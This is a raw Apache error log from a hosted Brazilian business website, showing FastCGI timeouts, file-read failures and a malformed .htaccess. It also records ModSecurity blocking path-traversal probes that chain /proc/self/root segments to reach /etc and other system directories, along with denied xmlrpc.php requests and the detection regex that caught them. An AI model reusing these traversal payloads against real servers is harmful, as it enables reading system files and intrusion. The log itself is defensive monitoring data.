[Thu Mar 19 23:49:46.133781 2026] [proxy_fcgi:error] [pid 7235:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45292] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:49:56.409006 2026] [:error] [pid 8307:tid 140411574073088] [client 74.7.228.61:39550] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aby11L-FhjpZGs9ba8qbxQAAAxQ"]
[Thu Mar 19 23:50:05.368181 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:46286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby128df6f5d65gmYZSqOQAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 23:50:28.854012 2026] [proxy_fcgi:error] [pid 7545:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46334] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:51:02.148084 2026] [proxy_fcgi:error] [pid 15826:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:47240] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:51:26.041884 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:47754] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:51:49.105880 2026] [proxy_fcgi:error] [pid 27293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48442] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:52:12.061882 2026] [proxy_fcgi:error] [pid 20435:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:49084] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:52:17.597909 2026] [mime_magic:error] [pid 8307:tid 140411666392832] (70014)End of file found: [client 57.141.18.91:50458] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:52:34.125807 2026] [proxy_fcgi:error] [pid 21219:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:49620] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:52:40.337545 2026] [:error] [pid 20435:tid 140411590858496] [client 74.7.244.43:38484] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aby2eJJaM1-0uhhUQJNJegAAAJI"]
[Thu Mar 19 23:52:54.342994 2026] [:error] [pid 8307:tid 140411683178240] [client 74.7.243.128:57876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby2hb-FhjpZGs9ba8qcIgAAAwc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 23:52:56.038594 2026] [proxy_fcgi:error] [pid 19655:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:50144] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:53:08.447163 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:56656] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby2lMdf6f5d65gmYZSqeQAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 23:53:15.440875 2026] [core:alert] [pid 21219:tid 140411590858496] [client 57.141.18.79:52572] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 23:53:18.101830 2026] [proxy_fcgi:error] [pid 7893:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50682] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:53:28.869035 2026] [mime_magic:error] [pid 26799:tid 140411540502272] (70014)End of file found: [client 57.141.18.32:53004] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:53:39.565999 2026] [mime_magic:error] [pid 8307:tid 140411658000128] (70014)End of file found: [client 57.141.18.79:53294] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:53:40.105833 2026] [proxy_fcgi:error] [pid 20435:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51168] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:53:49.111060 2026] [mime_magic:error] [pid 5816:tid 140411574073088] (70014)End of file found: [client 74.7.241.31:54204] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/include/linux
[Thu Mar 19 23:53:49.111315 2026] [access_compat:error] [pid 5816:tid 140411574073088] [client 74.7.241.31:54204] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/include/linux
[Thu Mar 19 23:53:58.635129 2026] [mime_magic:error] [pid 26799:tid 140411658000128] (70014)End of file found: [client 74.7.243.128:58966] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/spool/postfix
[Thu Mar 19 23:53:58.635350 2026] [access_compat:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:58966] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/spool/postfix
[Thu Mar 19 23:54:03.129796 2026] [proxy_fcgi:error] [pid 7545:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51772] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:54:25.125925 2026] [proxy_fcgi:error] [pid 27293:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52358] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:54:39.257258 2026] [mime_magic:error] [pid 8307:tid 140411574073088] (70014)End of file found: [client 57.141.18.35:54338] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:54:47.117803 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52880] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:54:57.113167 2026] [:error] [pid 21563:tid 140411649607424] [client 74.7.228.61:44992] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aby3AUpm7ZmxKZTM4bZ24gAAA4s"]
[Thu Mar 19 23:54:58.345779 2026] [mime_magic:error] [pid 21563:tid 140411666392832] (70014)End of file found: [client 57.141.18.104:55264] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:55:12.145819 2026] [proxy_fcgi:error] [pid 15826:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53480] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:55:15.314018 2026] [core:alert] [pid 26799:tid 140411548894976] [client 57.141.18.21:55680] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 23:55:26.413873 2026] [mime_magic:error] [pid 7893:tid 140411582465792] (70014)End of file found: [client 57.141.18.15:56008] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:55:38.129784 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53988] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:55:43.670377 2026] [proxy_fcgi:error] [pid 27293:tid 140411683178240] [client 192.185.4.27:17190] AH01071: Got error 'Primary script unknown'
[Thu Mar 19 23:56:12.098932 2026] [proxy_fcgi:error] [pid 20435:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54698] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:56:52.058033 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55578] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:57:23.065867 2026] [proxy_fcgi:error] [pid 7545:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56374] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:57:46.097835 2026] [proxy_fcgi:error] [pid 19655:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:56936] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:57:49.272053 2026] [:error] [pid 7545:tid 140411725141760] [client 74.7.244.43:44022] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aby3rX8B84UptSoTJtZASQAAAYI"]
[Thu Mar 19 23:58:04.309070 2026] [core:alert] [pid 19655:tid 140411599251200] [client 74.7.243.128:57456] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/lib/firmware
[Thu Mar 19 23:58:04.654111 2026] [mime_magic:error] [pid 30077:tid 140411733534464] (70014)End of file found: [client 57.141.18.87:59370] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:58:08.125808 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57422] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:58:30.125852 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57932] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:58:52.141785 2026] [proxy_fcgi:error] [pid 17653:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:58462] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:59:14.141846 2026] [proxy_fcgi:error] [pid 27293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59014] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:59:36.133838 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:59536] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:59:40.024587 2026] [mime_magic:error] [pid 17887:tid 140411708356352] (70014)End of file found: [client 57.141.18.103:34348] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 23:59:59.121942 2026] [proxy_fcgi:error] [pid 7235:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:60148] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:00:09.765621 2026] [mime_magic:error] [pid 26799:tid 140411666392832] (70014)End of file found: [client 57.141.18.64:35106] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 00:00:17.357819 2026] [mime_magic:error] [pid 8307:tid 140411716749056] (70014)End of file found: [client 57.141.18.7:35276] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 00:00:21.137775 2026] [proxy_fcgi:error] [pid 20435:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:60694] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:00:23.517062 2026] [mime_magic:error] [pid 17653:tid 140411599251200] (70014)End of file found: [client 57.141.18.66:35444] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 00:00:34.921552 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.243.128:38202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby4Uf-YZRR_7pZ7nDK9zQAAA9M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 00:00:36.653784 2026] [core:alert] [pid 7545:tid 140411708356352] [client 57.141.18.69:35830] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 00:00:36.654112 2026] [core:alert] [pid 15826:tid 140411548894976] [client 57.141.18.110:35828] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 00:00:42.403637 2026] [:error] [pid 20435:tid 140411733534464] [client 74.7.243.128:43442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby4WpJaM1-0uhhUQJNJ9wAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 00:00:44.130790 2026] [proxy_fcgi:error] [pid 30077:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33130] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:00:50.634315 2026] [core:alert] [pid 17653:tid 140411624429312] [client 57.141.18.23:36220] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 00:00:52.087972 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.243.128:34742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby4ZEpm7ZmxKZTM4bZ3fgAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 00:00:56.127935 2026] [:error] [pid 21563:tid 140411574073088] [client 74.7.243.128:34742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby4Zkpm7ZmxKZTM4bZ3fwAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 00:00:56.375828 2026] [:error] [pid 21563:tid 140411708356352] [client 74.7.243.128:34742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby4aEpm7ZmxKZTM4bZ3gAAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:00:57.983297 2026] [mime_magic:error] [pid 5816:tid 140411733534464] (70014)End of file found: [client 57.141.18.26:36392] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 00:01:07.126012 2026] [proxy_fcgi:error] [pid 17653:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33636] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:01:08.413788 2026] [mime_magic:error] [pid 14269:tid 140411624429312] (70014)End of file found: [client 57.141.18.81:36694] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 00:01:23.288731 2026] [mime_magic:error] [pid 8307:tid 140411582465792] (70014)End of file found: [client 74.7.243.128:34744] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/lib
[Fri Mar 20 00:01:34.129798 2026] [proxy_fcgi:error] [pid 8307:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:34218] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:01:45.651473 2026] [mime_magic:error] [pid 8307:tid 140411658000128] (70014)End of file found: [client 57.141.18.27:37754] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 00:02:03.865813 2026] [proxy_fcgi:error] [pid 7893:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34862] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:02:37.121937 2026] [proxy_fcgi:error] [pid 5816:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:35738] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:03:12.065138 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36512] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:03:24.263552 2026] [core:alert] [pid 21219:tid 140411632822016] [client 57.141.18.70:40562] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 00:03:27.583306 2026] [access_compat:error] [pid 27293:tid 140411540502272] [client 195.123.216.134:43382] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:03:29.690433 2026] [access_compat:error] [pid 26799:tid 140411674785536] [client 212.95.50.223:49018] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:03:32.327464 2026] [access_compat:error] [pid 17653:tid 140411699963648] [client 45.66.35.22:41618] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:03:33.958795 2026] [access_compat:error] [pid 19655:tid 140411708356352] [client 107.189.30.86:42084] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:03:35.871367 2026] [access_compat:error] [pid 19655:tid 140411658000128] [client 45.148.10.111:35864] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:03:41.129793 2026] [proxy_fcgi:error] [pid 21219:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37422] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:03:44.615706 2026] [access_compat:error] [pid 7545:tid 140411666392832] [client 45.141.215.238:56886] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:03:56.761550 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.244.43:38326] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aby5HEpm7ZmxKZTM4bZ34QAAA5E"]
[Fri Mar 20 00:04:05.125810 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:38184] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:04:21.108831 2026] [access_compat:error] [pid 5816:tid 140411741927168] [client 62.93.179.227:41659] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:04:26.125846 2026] [proxy_fcgi:error] [pid 27293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38824] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:04:35.232418 2026] [access_compat:error] [pid 7893:tid 140411658000128] [client 185.241.208.184:62058] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:04:48.125789 2026] [proxy_fcgi:error] [pid 17653:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39448] AH01075: Error dispatching request to : (polling)
